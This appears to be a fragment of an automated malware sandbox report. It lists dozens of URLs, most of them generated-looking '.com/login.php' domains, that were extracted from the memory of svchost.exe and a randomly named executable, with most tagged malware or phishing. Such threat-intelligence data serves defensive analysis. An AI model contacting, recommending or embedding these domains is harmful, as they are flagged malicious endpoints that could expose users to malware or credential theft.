                                                                                                                                                                                                          http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.1538642409.0000000008A8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539162244.0000000008A8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538616359.0000000008A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.comsvchost.exe, 00000002.00000003.1684990918.0000000008BC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665016575.0000000008AE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661256146.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxynyx.com/login.phpnsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purylup.com/svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyfyp.com/login.phpsvchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygyjuj.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumytup.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumyjip.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gacyqoz.com/http://lygyfej.com/http://vocyqot.com/http://gacyqoz.com/Hsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vocypok.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvygyv.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purywoq.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.1390048627.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390711474.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390491692.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875058594.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2625703079.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616788232.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716727400.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1412887155.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120851467.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1398889541.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889505054.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482651296.0000000008B14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633062384.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1921018438.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657357854.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390666834.0000000008AEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123029886.0000000008B15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939708124.0000000008B15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043107517.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupywog.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://cdn.ampproject.orgsvchost.exe, 00000002.00000003.2034139973.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961980550.0000000008B31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741910856.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701402792.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795820194.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904192190.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085122361.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741405663.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808484728.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129347046.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793839467.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803590618.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804281709.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130554796.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702085339.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885635584.0000000008B30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1912940581.0000000008B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://volyjif.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vofydak.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujymiq.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gacynuz.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvytuj.com/http://vojyjof.com/http://vojyjof.com/svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxysad.com/login.phpsvchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatyniz.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxylux.com/svchost.exe, 00000002.00000003.1613886596.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008A90000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008CE0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyzez.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529751923.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyjad.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.0000000008723000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000C53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puryxuv.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volyzic.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576914176.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576643702.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577232502.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopymyc.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pufybyv.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433310384.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431777445.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1437941480.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433275152.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432955986.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykygur.com/svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygygux.com/http://pumypop.com/http://lyxywen.com/http://vojyjot.com/http://ganypis.com/http:svchost.exe, 00000002.00000003.1587051265.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1588374175.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojycec.com/svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560390344.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878418467.0000000008AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://galyfis.com/svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.google.comtnlsvchost.exe, 00000002.00000003.1782288981.000000000D6C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1888650263.000000000D6C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujygug.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujydap.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykymij.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyvan.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664161481.0000000002FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://purywoq.com/svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623273895.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483228275.0000000008ACE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
